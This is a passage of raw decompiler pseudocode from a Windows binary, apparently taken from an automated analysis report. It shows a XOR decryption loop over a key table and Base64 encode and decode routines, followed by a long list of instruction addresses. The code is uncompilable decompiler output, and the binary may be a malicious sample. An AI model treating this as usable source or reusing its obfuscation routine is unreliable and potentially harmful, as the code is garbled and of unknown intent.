												__eflags = 0;
												_v68 = _t1295;
												_v56 = 0;
												do {
													_t1364 = _t1138;
													__eflags = _t711 - _t1295;
													if(_t711 != _t1295) {
														_t1296 = 0x100;
													} else {
														_t1296 = _a20 - (0xf0f0f0f1 * _a20 >> 0x20 >> 8) * 0x110 - 0x10;
													}
													_v48 = _t1296;
													_t1139 = 0;
													__eflags = 0;
													do {
														__eflags = _t1065 - 0x10;
														_t809 =  >=  ? _t1334 :  &_a4;
														_t453 = _t1139 + 0xc2eb34; // 0x987249c
														__eflags = _t1065 - 0x10;
														 *(_t1379 + _t1139 - 0x20) =  *(( >=  ? _t1334 :  &_a4) + _t1364) & 0x000000ff ^  *_t453;
														_t813 =  >=  ? _t1334 :  &_a4;
														_t459 = _t1139 + 0xc2eb35; // 0x81098724
														__eflags = _t1065 - 0x10;
														 *(_t1379 + _t1139 - 0x1f) =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 1) & 0x000000ff ^  *_t459;
														_t817 =  >=  ? _t1334 :  &_a4;
														_t465 = _t1139 + 0xc2eb36; // 0x49810987
														__eflags = _t1065 - 0x10;
														 *(_t1379 + _t1139 - 0x1e) =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 2) & 0x000000ff ^  *_t465;
														_t821 =  >=  ? _t1334 :  &_a4;
														_t822 =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 3) & 0x000000ff;
														_t1364 = _t1364 + 4;
														_t471 = _t1139 + 0xc2eb37; // 0x7d498109
														 *(_t1379 + _t1139 - 0x1d) = _t822 ^  *_t471;
														_t1139 = _t1139 + 4;
														__eflags = _t1139 - 0x10;
													} while (_t1139 < 0x10);
													_t824 = 0;
													__eflags = _t1296;
													if(_t1296 > 0) {
														do {
															__eflags = _t1065 - 0x10;
															_t1142 =  >=  ? _t1334 :  &_a4;
															_t1078 = ( >=  ? _t1334 :  &_a4) + _t1364;
															_t1143 = _v64;
															_t1347 = _t1143;
															__eflags =  *((intOrPtr*)(_t1143 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t1143 + 0x14)) >= 0x10) {
																_t1347 =  *_t1143;
															}
															_t1364 = _t1364 + 1;
															_t1146 =  *0xc2eb30; // 0xc2e9d0
															 *(_v44 + _t1347 + _t824) =  *(_t1379 + (_t824 & 0x0000000f) - 0x20) ^  *(_t1146 + _t824) ^  *_t1078;
															_t824 = _t824 + 1;
															_t1065 = _a24;
															_t1334 = _a4;
															__eflags = _t824 - _v48;
														} while (_t824 < _v48);
													}
													_t711 = _v52 + 1;
													_v44 = _v44 + 0x100;
													_t1138 = _v56 + 0x110;
													_t1295 = _v68;
													_v52 = _t711;
													_v56 = _t1138;
													__eflags = _t711 - _v60;
												} while (_t711 < _v60);
												_t1351 = _v64;
											}
											__eflags = _t1065 - 0x10;
											if(_t1065 < 0x10) {
												L241:
												 *[fs:0x0] = _v20;
												__eflags = _v24 ^ _t1379;
												return E00BF44D0(_v24 ^ _t1379);
											} else {
												_t1067 = _t1065 + 1;
												_t714 = _t1334;
												__eflags = _t1067 - 0x1000;
												if(_t1067 < 0x1000) {
													L240:
													_push(_t1067);
													E00BF4B47(_t1334);
													goto L241;
												} else {
													_t1334 =  *((intOrPtr*)(_t1334 - 4));
													_t1067 = _t1067 + 0x23;
													__eflags = _t714 - _t1334 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														E00C01351(_t1067, _t1088, _t1251, _t1334, __eflags);
														asm("int3");
														_push(_t1379);
														_t1380 = _t1386;
														_t1388 = _t1386 - 0x20;
														_push(_t1067);
														_push(_t1351);
														_t1353 = _t1088;
														_v140 = 3;
														_push(_t1334);
														_t1336 = _t1251;
														_t1068 = 0;
														_v144 = _t1336;
														_v132 = 0;
														E00BE5E20(0xaaaaaaab * ( *(_t1353 + 0x10) - ( *(_t1353 + 0x10) + 2) % _v140 + 2), 0, _t1336, 0xaaaaaaab * ( *(_t1353 + 0x10) - ( *(_t1353 + 0x10) + 2) % _v140 + 2) >> 0x20 >> 1 << 2, 0);
														__eflags =  *((intOrPtr*)(_t1353 + 0x14)) - 0x10;
														_t724 =  *(_t1353 + 0x10);
														if( *((intOrPtr*)(_t1353 + 0x14)) >= 0x10) {
															_t1353 =  *_t1353;
														}
														__eflags = _t724;
														if(_t724 == 0) {
															L275:
															__eflags = _t1068 -  *((intOrPtr*)(_t1336 + 0x10));
															_t580 = _t1068 ==  *((intOrPtr*)(_t1336 + 0x10));
															__eflags = _t580;
															return _t724 & 0xffffff00 | _t580;
														} else {
															_t1097 = 0;
															__eflags = 0;
															do {
																_v44 = _t724 - 1;
																_t727 = _t1353;
																_t1353 = _t1353 + 1;
																 *((char*)(_t1380 + _t1097 - 8)) =  *_t727;
																_t1097 = _t1097 + 1;
																_t1258 = _v19;
																_v13 = _v18;
																_v15 = _t1258;
																__eflags = _t1097 - 3;
																if(_t1097 == 3) {
																	_t1070 = _v28;
																	_v32 = _t1336;
																	_t794 = _t1258 >> 4;
																	_t1134 = ((_t1258 & 0x00000003) << 4) + _t794;
																	_v24 = _t794;
																	_t1294 = ((_t1258 & 0x0000000f) << 2) + (_v13 >> 6);
																	_v23 = _t1134;
																	_t798 = _v13 & 0x0000003f;
																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																	_v14 = _t798;
																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																		_v32 =  *_t1336;
																		_t1070 = _v28;
																	}
																	 *((char*)(_v32 + _t1070)) =  *((intOrPtr*)((_t798 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
																	_t1336 = _v40;
																	_v32 = _t1336;
																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																		_v32 =  *_t1336;
																	}
																	 *((char*)(_t1070 + _v32 + 1)) =  *((intOrPtr*)((_t1134 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
																	_t1136 = _t1336;
																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																		_t1136 =  *_t1336;
																	}
																	 *((char*)(_t1070 + _t1136 + 2)) =  *((intOrPtr*)((_t1294 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
																	_t1137 = _t1336;
																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																		_t1137 =  *_t1336;
																	}
																	_t1258 = _v15;
																	 *((char*)(_t1070 + _t1137 + 3)) =  *((intOrPtr*)((_v14 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
																	_t1068 = _t1070 + 4;
																	_v28 = _t1068;
																	_t1097 = 0;
																	__eflags = 0;
																}
																_t724 = _v44;
																__eflags = _t724;
															} while (_t724 != 0);
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L275;
															} else {
																_t730 = _t1097;
																__eflags = _t1097 - 3;
																if(_t1097 >= 3) {
																	goto L265;
																} else {
																	__eflags = _t730 - 3;
																	while(__eflags < 0) {
																		 *((char*)(_t1380 + _t730 - 8)) = 0;
																		_t730 = _t730 + 1;
																		__eflags = _t730 - 3;
																		if(__eflags < 0) {
																			continue;
																		} else {
																			_t1258 = _v20;
																			L265:
																			_t563 = _t1097 + 1; // 0x2
																			_t1355 = _t563;
																			_t1259 = _t1258 & 0x00000003;
																			_v24 = _t1258 >> 2;
																			_t735 = _t1259 >> 4;
																			_t1263 = ((_t1259 & 0x0000000f) << 4) + _t735 << 2;
																			_v23 = _t1263;
																			_t724 = _t735 >> 0x00000006 & 0x0000003f;
																			_v21 = _t724;
																			_v22 = _t1263 + _t724;
																			__eflags = _t1355;
																			if(_t1355 > 0) {
																				_t739 =  &_v24 - _t1068;
																				__eflags = _t739;
																				_v44 = _t739;
																				do {
																					__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																					_t1267 = _t1336;
																					if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																						_t1267 =  *_t1336;
																					}
																					 *((char*)(_t1267 + _t1068)) =  *((intOrPtr*)(( *(_t739 + _t1068) & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
																					_t1068 = _t1068 + 1;
																					_t739 = _v44;
																					_t1355 = _t1355 - 1;
																					__eflags = _t1355;
																				} while (_t1355 != 0);
																			}
																			__eflags = _t1097 - 3;
																			if(_t1097 < 3) {
																				_t1266 = _v36 - _t1097;
																				__eflags = _t1266;
																				do {
																					__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
																					_t724 = _t1336;
																					if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
																						_t724 =  *_t1336;
																					}
																					 *((char*)(_t724 + _t1068)) = 0x3d;
																					_t1068 = _t1068 + 1;
																					_t1266 = _t1266 - 1;
																					__eflags = _t1266;
																				} while (_t1266 != 0);
																			}
																			goto L275;
																		}
																		goto L338;
																	}
																	E00BF47EC();
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t1380);
																	_t1381 = _t1388;
																	_t1389 = _t1388 - 0x18;
																	_push(_t1068);
																	_t743 = _t1097;
																	_t1071 = _t1258;
																	_push(_t1353);
																	_push(_t1336);
																	_t1339 = 0;
																	_v188 = _t1071;
																	_t1268 =  *((intOrPtr*)(_t743 + 0x14));
																	_t1356 = _t743;
																	_v180 = 0;
																	_v184 =  *((intOrPtr*)(_t743 + 0x10));
																	__eflags = _t1268 - 0x10;
																	if(_t1268 >= 0x10) {
																		_t1356 =  *_t743;
																	}
																	_t1099 = 0;
																	__eflags = _t1268 - 0x10;
																	if(_t1268 >= 0x10) {
																		_t743 =  *_t743;
																	}
																	_t1269 = _v36;
																	_t744 = _t743 + _v36;
																	__eflags =  *((char*)(_t744 - 1)) - 0x3d;
																	while( *((char*)(_t744 - 1)) == 0x3d) {
																		_t744 = _t744 - 1;
																		_t1099 = _t1099 + 1;
																		__eflags =  *((char*)(_t744 - 1)) - 0x3d;
																	}
																	asm("cdq");
																	_t1100 = _t1071;
																	E00BE5E20((_t1269 + _t1269 * 2 + _t1269 + _t1269 * 2 + (_t1269 & 0x00000007) >> 3) - _t1099, _t1071, _t1100, (_t1269 + _t1269 * 2 + _t1269 + _t1269 * 2 + (_t1269 & 0x00000007) >> 3) - _t1099, 0);
																	_t751 = _v36;
																	__eflags = _t751;
																	if(_t751 == 0) {
																		__eflags = 0 -  *((intOrPtr*)(_t1071 + 0x10));
																		_t654 = 0 ==  *((intOrPtr*)(_t1071 + 0x10));
																		__eflags = _t654;
																		return _t751 & 0xffffff00 | _t654;
																	} else {
																		while(1) {
																			_v36 = _t751 - 1;
																			_t754 =  *_t1356;
																			__eflags = _t754 - 0x3d;
																			if(_t754 == 0x3d) {
																				break;
																			}
																			 *(_t1381 + _t1339 - 0xc) = _t754;
																			_t1356 = _t1356 + 1;
																			_t1339 = _t1339 + 1;
																			__eflags = _t1339 - 4;
																			if(_t1339 == 4) {
																				_t1283 = 0;
																				__eflags = 0;
																				_t596 = _t1339 + 0x3b; // 0x3c
																				_t1076 = _t596;
																				do {
																					_t1121 =  *((intOrPtr*)(_t1381 + _t1283 - 0xc));
																					_t781 = _t1121 - 0x41;
																					__eflags = _t781 - 0x19;
																					if(_t781 > 0x19) {
																						__eflags = _t1121 - 0x61 - 0x19;
																						if(_t1121 - 0x61 > 0x19) {
																							__eflags = _t1121 - 0x30 - 9;
																							if(_t1121 - 0x30 > 9) {
																								__eflags = _t1121 - 0x2b;
																								if(_t1121 != 0x2b) {
																									__eflags = _t1121 - 0x2f;
																									_t781 =  ==  ? _t1076 : 0xff;
																								} else {
																									_t781 = 0x3e;
																								}
																							} else {
																								_t781 = _t1121 + 4;
																							}
																						} else {
																							_t781 = _t1121 - 0x47;
																						}
																					}
																					 *((char*)(_t1381 + _t1283 - 0xc)) = _t781;
																					_t1283 = _t1283 + 1;
																					__eflags = _t1283 - 4;
																				} while (_t1283 < 4);
																				_t782 = _v28;
																				_t1071 = _v40;
																				_t1124 = _t782 << 2;
																				_t1346 = _t1071;
																				_t1287 = (_t782 >> 0x00000004 & 0x00000003) + _t1124;
																				_t1130 = ((_t1124 >> 0x00000002 & 0x0000000f) << 6) + _v25 + (_t782 << 4);
																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
																				_v24 = _t1287;
																				_v23 = _t1130;
																				_v17 = _t1130;
																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
																					_t1346 =  *_t1071;
																				}
																				_t785 = _v32;
																				 *((char*)(_t1346 + _t785)) = _t1287;
																				_t1288 = _t1071;
																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
																					_t1288 =  *_t1071;
																				}
																				 *((char*)(_t785 + _t1288 + 1)) = _t1130;
																				_t1100 = _t1071;
																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
																					_t1100 =  *_t1071;
																				}
																				 *((char*)(_t785 + _t1100 + 2)) = _v17;
																				_v32 = _t785 + 3;
																				_t1339 = 0;
																				__eflags = 0;
																			}
																			_t751 = _v36;
																			__eflags = _t751;
																			if(_t751 != 0) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t1339;
																		if(_t1339 == 0) {
																			_t1272 = _v32;
																			goto L329;
																		} else {
																			_t756 = _t1339;
																			__eflags = _t1339 - 4;
																			if(_t1339 >= 4) {
																				L311:
																				_t1273 = 0;
																				__eflags = 0;
																				_t627 = _t1273 + 0x3f; // 0x3f
																				_t1074 = _t627;
																				do {
																					_t1101 =  *((intOrPtr*)(_t1381 + _t1273 - 0xc));
																					_t630 = _t1101 - 0x41; // -65
																					_t757 = _t630;
																					__eflags = _t757 - 0x19;
																					if(_t757 > 0x19) {
																						_t631 = _t1101 - 0x61; // -97
																						__eflags = _t631 - 0x19;
																						if(_t631 > 0x19) {
																							__eflags = _t1101 - 0x30 - 9;
																							if(_t1101 - 0x30 > 9) {
																								__eflags = _t1101 - 0x2b;
																								if(_t1101 != 0x2b) {
																									__eflags = _t1101 - 0x2f;
																									_t757 =  ==  ? _t1074 : 0xff;
																								} else {
																									_t757 = 0x3e;
																								}
																							} else {
																								_t757 = _t1101 + 4;
																							}
																						} else {
																							_t632 = _t1101 - 0x47; // -71
																							_t757 = _t632;
																						}
																					}
																					 *((char*)(_t1381 + _t1273 - 0xc)) = _t757;
																					_t1273 = _t1273 + 1;
																					__eflags = _t1273 - 4;
																				} while (_t1273 < 4);
																				_t758 = _v28;
																				_t1342 = _t1339 - 1;
																				_t1071 = _v40;
																				_v24 = (_t758 >> 0x00000004 & 0x00000003) + (_t758 << 2);
																				_t1278 = _v26;
																				_t754 = _t758 << 4;
																				_v22 = (_t1278 << 6) + _v25;
																				_t1272 = _v32;
																				_v23 = (_t1278 >> 0x00000002 & 0x0000000f) + _t754;
																				__eflags = _t1342;
																				if(_t1342 <= 0) {
																					L329:
																					__eflags = _t1272 -  *((intOrPtr*)(_t1071 + 0x10));
																					_t658 = _t1272 ==  *((intOrPtr*)(_t1071 + 0x10));
																					__eflags = _t658;
																					return _t754 & 0xffffff00 | _t658;
																				} else {
																					_t1360 =  &_v24 - _t1272;
																					__eflags = _t1360;
																					do {
																						__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
																						_t1108 = _t1071;
																						if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
																							_t1108 =  *_t1071;
																						}
																						_t760 =  *((intOrPtr*)(_t1360 + _t1272));
																						 *(_t1108 + _t1272) = _t760;
																						_t1272 = _t1272 + 1;
																						_t1342 = _t1342 - 1;
																						__eflags = _t1342;
																					} while (_t1342 != 0);
																					__eflags = _t1272 -  *((intOrPtr*)(_t1071 + 0x10));
																					_t651 = _t1272 ==  *((intOrPtr*)(_t1071 + 0x10));
																					__eflags = _t651;
																					return _t760 & 0xffffff00 | _t651;
																				}
																			} else {
																				__eflags = _t756 - 4;
																				while(__eflags < 0) {
																					 *((char*)(_t1381 + _t756 - 0xc)) = 0;
																					_t756 = _t756 + 1;
																					__eflags = _t756 - 4;
																					if(__eflags < 0) {
																						continue;
																					} else {
																						goto L311;
																					}
																					goto L338;
																				}
																				E00BF47EC();
																				asm("int3");
																				asm("int3");
																				_push(_t1381);
																				_t1382 = _t1389;
																				_push(0xffffffff);
																				_push(0xc16f58);
																				_push( *[fs:0x0]);
																				_t767 =  *0xc2e00c; // 0x5cb9e59c
																				_t768 = _t767 ^ _t1382;
																				__eflags = _t768;
																				_v220 = _t768;
																				_push(_t1356);
																				_push(_t1339);
																				_push(_t768);
																				 *[fs:0x0] =  &_v216;
																				_t1362 = _t1100;
																				_v356 = _t1362;
																				_v356 = _t1362;
																				_v208 = 0;
																				_v352 =  &_v348;
																				E00BE6D40( &_v352, _v196, 3);
																				_v208 = 1;
																				_t1281 = _v352;
																				_t1110 = _v352;
																				 *(_t1362 + 0x10) = 0;
																				 *((intOrPtr*)(_t1362 + 0x14)) = 0xf;
																				 *_t1362 = 0;
																				_t672 = _t1110 + 1; // 0x1
																				_t1344 = _t672;
																				do {
																					_t772 =  *_t1110;
																					_t1110 = _t1110 + 1;
																					__eflags = _t772;
																				} while (_t772 != 0);
																				_push(_t1110 - _t1344);
																				E00BE7D20(_t1071, _t1362, _t1344, _t1281);
																				_t774 = _v168;
																				_t1113 =  &_v164;
																				__eflags = _t774 - _t1113;
																				if(_t774 != _t1113) {
																					E00C01D58(_t774);
																				}
																				_v24 = 0xffffffff;
																				_t776 = _v12 + 0xfffffff0;
																				asm("lock xadd [eax+0xc], ecx");
																				__eflags = (_t1113 | 0xffffffff) - 1;
																				if((_t1113 | 0xffffffff) - 1 <= 0) {
																					 *((intOrPtr*)( *((intOrPtr*)( *_t776)) + 4))(_t776);
																				}
																				 *[fs:0x0] = _v32;
																				__eflags = _v36 ^ _t1382;
																				return E00BF44D0(_v36 ^ _t1382);
																			}
																		}
																	}
																}
															}
														}
													} else {
														goto L240;
													}
												}
											}
										} else {
											goto L217;
										}
									}
								}
							}
						}
					}
				} else {
					__ecx[0x3e] = 3;
					L219:
					 *[fs:0x0] = _v16;
					return E00BF44D0(_v20 ^ _t1378);
				}
				L338:
			}

























































































































































































































































































































































                                  0x00bd5230
                                  0x00bd5230
                                  0x00bd5230
                                  0x00bd5233
                                  0x00bd5235
                                  0x00bd5240
                                  0x00bd5246
                                  0x00bd524b
                                  0x00bd5250
                                  0x00bd5252
                                  0x00bd5255
                                  0x00bd5256
                                  0x00bd5257
                                  0x00bd525b
                                  0x00bd5261
                                  0x00bd5263
                                  0x00bd526d
                                  0x00bd5270
                                  0x00bd528a
                                  0x00bd528f
                                  0x00bd529c
                                  0x00bd52a8
                                  0x00bd52b0
                                  0x00bd52b5
                                  0x00bd52b8
                                  0x00bd52ba
                                  0x00bd52c8
                                  0x00bd52da
                                  0x00bd52e2
                                  0x00bd52e7
                                  0x00bd52ea
                                  0x00bd52ec
                                  0x00bd65b0
                                  0x00000000
                                  0x00bd52f2
                                  0x00bd52f2
                                  0x00bd52f7
                                  0x00000000
                                  0x00bd52f7
                                  0x00bd52bc
                                  0x00bd52bc
                                  0x00bd52c1
                                  0x00bd52fc
                                  0x00bd52fc
                                  0x00bd5304
                                  0x00bd5309
                                  0x00bd530c
                                  0x00bd5313
                                  0x00bd5346
                                  0x00bd5360
                                  0x00bd5374
                                  0x00bd5387
                                  0x00bd5392
                                  0x00bd539c
                                  0x00bd53a2
                                  0x00bd53ab
                                  0x00bd53b5
                                  0x00bd53b8
                                  0x00bd53be
                                  0x00bd53c2
                                  0x00bd53c5
                                  0x00bd53cd
                                  0x00bd53d5
                                  0x00bd53df
                                  0x00bd53e7
                                  0x00bd53f1
                                  0x00bd53fb
                                  0x00bd5405
                                  0x00bd540f
                                  0x00bd5411
                                  0x00bd5411
                                  0x00bd5421
                                  0x00bd5427
                                  0x00bd5429
                                  0x00000000
                                  0x00bd542f
                                  0x00bd542f
                                  0x00bd5435
                                  0x00bd5440
                                  0x00bd5440
                                  0x00bd5443
                                  0x00bd5446
                                  0x00bd5446
                                  0x00bd545a
                                  0x00bd5467
                                  0x00bd5470
                                  0x00bd5476
                                  0x00bd547c
                                  0x00bd547e
                                  0x00000000
                                  0x00bd5484
                                  0x00bd548b
                                  0x00bd5492
                                  0x00bd5495
                                  0x00bd54af
                                  0x00bd54b8
                                  0x00bd54be
                                  0x00bd54c0
                                  0x00bd54c6
                                  0x00bd54c8
                                  0x00bd65a2
                                  0x00bd65a8
                                  0x00000000
                                  0x00bd54ce
                                  0x00bd54ce
                                  0x00bd54d2
                                  0x00bd54d4
                                  0x00bd54db
                                  0x00bd54e5
                                  0x00bd54f3
                                  0x00bd54f3
                                  0x00bd54db
                                  0x00bd54f9
                                  0x00bd54f9
                                  0x00bd5500
                                  0x00bd5500
                                  0x00bd5500
                                  0x00bd5503
                                  0x00bd5509
                                  0x00bd550c
                                  0x00000000
                                  0x00bd5512
                                  0x00bd5512
                                  0x00bd5518
                                  0x00bd551a
                                  0x00bd551c
                                  0x00bd5523
                                  0x00bd5529
                                  0x00bd552b
                                  0x00bd552b
                                  0x00bd5535
                                  0x00bd553b
                                  0x00bd553d
                                  0x00bd553f
                                  0x00bd5545
                                  0x00bd5545
                                  0x00bd553d
                                  0x00bd551a
                                  0x00bd554b
                                  0x00bd5552
                                  0x00bd562d
                                  0x00bd562d
                                  0x00bd5634
                                  0x00bd5645
                                  0x00bd5652
                                  0x00bd565c
                                  0x00bd5661
                                  0x00bd5667
                                  0x00bd566a
                                  0x00bd566e
                                  0x00bd5670
                                  0x00bd5670
                                  0x00bd567f
                                  0x00bd5684
                                  0x00bd568d
                                  0x00bd5693
                                  0x00bd569f
                                  0x00bd56a5
                                  0x00bd56a7
                                  0x00bd56af
                                  0x00bd56af
                                  0x00bd56b5
                                  0x00bd56bb
                                  0x00bd56bd
                                  0x00bd56bf
                                  0x00bd56c6
                                  0x00bd56cc
                                  0x00bd56ce
                                  0x00bd56ce
                                  0x00bd56d0
                                  0x00bd56da
                                  0x00bd56e0
                                  0x00bd56e2
                                  0x00bd56ea
                                  0x00bd56ea
                                  0x00bd56f0
                                  0x00bd56f6
                                  0x00bd56f8
                                  0x00bd56fa
                                  0x00bd5701
                                  0x00bd5707
                                  0x00bd5709
                                  0x00bd5709
                                  0x00bd570b
                                  0x00bd5715
                                  0x00bd571b
                                  0x00bd571d
                                  0x00bd571f
                                  0x00bd5725
                                  0x00bd5725
                                  0x00bd571d
                                  0x00bd56f8
                                  0x00bd56bd
                                  0x00bd5738
                                  0x00bd573f
                                  0x00bd5745
                                  0x00bd5747
                                  0x00bd5963
                                  0x00bd5963
                                  0x00bd5969
                                  0x00bd596b
                                  0x00bd5973
                                  0x00bd5986
                                  0x00bd598c
                                  0x00bd598e
                                  0x00bd5990
                                  0x00bd5996
                                  0x00bd5996
                                  0x00bd598e
                                  0x00bd599f
                                  0x00bd59a5
                                  0x00bd59a7
                                  0x00000000
                                  0x00bd59ad
                                  0x00bd59af
                                  0x00bd59b5
                                  0x00bd59c7
                                  0x00bd59cd
                                  0x00bd59cf
                                  0x00bd59e0
                                  0x00bd59ed
                                  0x00bd5a02
                                  0x00bd5a06
                                  0x00bd5a10
                                  0x00bd5a15
                                  0x00bd5a18
                                  0x00bd5a2c
                                  0x00bd5a32
                                  0x00bd5a34
                                  0x00bd5f08
                                  0x00bd5f09
                                  0x00bd5f0e
                                  0x00bd5f14
                                  0x00000000
                                  0x00bd5a3a
                                  0x00bd5a3a
                                  0x00bd5a3c
                                  0x00bd5a3c
                                  0x00bd5a40
                                  0x00bd5a40
                                  0x00bd5a43
                                  0x00bd5a46
                                  0x00bd5a46
                                  0x00bd5a4d
                                  0x00bd5a52
                                  0x00bd5a5b
                                  0x00bd5a60
                                  0x00bd5a6a
                                  0x00bd5a74
                                  0x00bd5a80
                                  0x00bd5a84
                                  0x00bd5a90
                                  0x00bd5a9a
                                  0x00bd5aa4
                                  0x00bd5aab
                                  0x00bd5ab0
                                  0x00bd5ab4
                                  0x00bd5abb
                                  0x00bd5abd
                                  0x00bd5ac4
                                  0x00bd5aca
                                  0x00bd5acf
                                  0x00bd5adf
                                  0x00bd5ae4
                                  0x00bd5ae7
                                  0x00bd5ae9
                                  0x00bd5af1
                                  0x00bd5b02
                                  0x00bd5b04
                                  0x00bd5b06
                                  0x00bd5b09
                                  0x00bd5b0b
                                  0x00bd5b0d
                                  0x00bd5b11
                                  0x00bd5b13
                                  0x00bd5b15
                                  0x00bd5b15
                                  0x00bd5b17
                                  0x00bd5b1b
                                  0x00bd5b1b
                                  0x00bd5b0b
                                  0x00bd5b04
                                  0x00bd5ae9
                                  0x00bd5b20
                                  0x00bd5b27
                                  0x00bd5b2d
                                  0x00bd5b32
                                  0x00bd5b42
                                  0x00bd5b47
                                  0x00bd5b4a
                                  0x00bd5b4c
                                  0x00bd5b54
                                  0x00bd5b65
                                  0x00bd5b67
                                  0x00bd5b69
                                  0x00bd5b6d
                                  0x00bd5b6f
                                  0x00bd5b6f
                                  0x00bd5b72
                                  0x00bd5b77
                                  0x00bd5b7a
                                  0x00bd5b7a
                                  0x00bd5b67
                                  0x00bd5b80
                                  0x00bd5b87
                                  0x00bd5b8d
                                  0x00bd5b92
                                  0x00bd5ba2
                                  0x00bd5ba7
                                  0x00bd5baa
                                  0x00bd5bac
                                  0x00bd5bb4
                                  0x00bd5bc5
                                  0x00bd5bc7
                                  0x00bd5bc9
                                  0x00bd5bcf
                                  0x00bd5bd1
                                  0x00bd5bd3
                                  0x00bd5bd7
                                  0x00bd5bd9
                                  0x00bd5bdb
                                  0x00bd5bdb
                                  0x00bd5bdd
                                  0x00bd5be1
                                  0x00bd5be1
                                  0x00bd5bd1
                                  0x00bd5bc7
                                  0x00bd5be6
                                  0x00bd5bed
                                  0x00bd5bf3
                                  0x00bd5bf8
                                  0x00bd5c08
                                  0x00bd5c0d
                                  0x00bd5c13
                                  0x00bd5c16
                                  0x00bd5c1c
                                  0x00bd5c1e
                                  0x00bd5dce
                                  0x00bd5dce
                                  0x00bd5dd2
                                  0x00bd5dd8
                                  0x00bd5ddb
                                  0x00bd5e12
                                  0x00bd5e14
                                  0x00bd5e1e
                                  0x00bd5e28
                                  0x00bd5e2f
                                  0x00bd5e32
                                  0x00bd5e34
                                  0x00bd5f02
                                  0x00bd5f02
                                  0x00000000
                                  0x00bd5e3a
                                  0x00bd5e3a
                                  0x00bd5e40
                                  0x00bd5ea5
                                  0x00bd5eb9
                                  0x00bd5ebb
                                  0x00bd5ebe
                                  0x00bd5ec4
                                  0x00bd5eda
                                  0x00bd5eda
                                  0x00bd5edc
                                  0x00bd5ee1
                                  0x00bd5ee4
                                  0x00bd5eee
                                  0x00bd5ef8
                                  0x00000000
                                  0x00bd5ec6
                                  0x00bd5ec6
                                  0x00bd5ec9
                                  0x00bd5ed1
                                  0x00bd5ed4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd5ed4
                                  0x00bd5e42
                                  0x00bd5e42
                                  0x00bd5e42
                                  0x00bd5e45
                                  0x00bd5e45
                                  0x00bd5e47
                                  0x00bd5e4a
                                  0x00000000
                                  0x00bd5e4c
                                  0x00bd5e4c
                                  0x00bd5e4f
                                  0x00bd5e56
                                  0x00bd5e5c
                                  0x00bd5e74
                                  0x00bd5e74
                                  0x00bd5e76
                                  0x00bd5e7b
                                  0x00000000
                                  0x00bd5e5e
                                  0x00bd5e5e
                                  0x00bd5e61
                                  0x00bd5e69
                                  0x00bd5e6c
                                  0x00000000
                                  0x00bd5e72
                                  0x00bd5e72
                                  0x00000000
                                  0x00bd5e72
                                  0x00bd5e6c
                                  0x00bd5e5c
                                  0x00000000
                                  0x00bd5e7e
                                  0x00bd5e80
                                  0x00bd5e87
                                  0x00bd5e8b
                                  0x00bd5e91
                                  0x00bd5e97
                                  0x00bd5e97
                                  0x00bd5e9f
                                  0x00000000
                                  0x00bd5e9f
                                  0x00bd5e40
                                  0x00bd5ddd
                                  0x00bd5ddd
                                  0x00bd5de3
                                  0x00bd5dea
                                  0x00bd5dec
                                  0x00bd5df2
                                  0x00bd5e08
                                  0x00bd5e08
                                  0x00bd5e0a
                                  0x00bd5e0f
                                  0x00000000
                                  0x00bd5df4
                                  0x00bd5df4
                                  0x00bd5df7
                                  0x00bd5dff
                                  0x00bd5e02
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd5e02
                                  0x00bd5df2
                                  0x00bd5c24
                                  0x00bd5c2f
                                  0x00bd5c35
                                  0x00bd5c37
                                  0x00000000
                                  0x00bd5c3d
                                  0x00bd5c3d
                                  0x00bd5c43
                                  0x00bd5c4d
                                  0x00bd5c53
                                  0x00bd5c55
                                  0x00bd5c55
                                  0x00bd5c59
                                  0x00bd5c5b
                                  0x00bd5c5d
                                  0x00bd5c5d
                                  0x00bd5c5f
                                  0x00bd5c63
                                  0x00bd5c6b
                                  0x00bd5c71
                                  0x00bd5c79
                                  0x00bd5c80
                                  0x00bd5c80
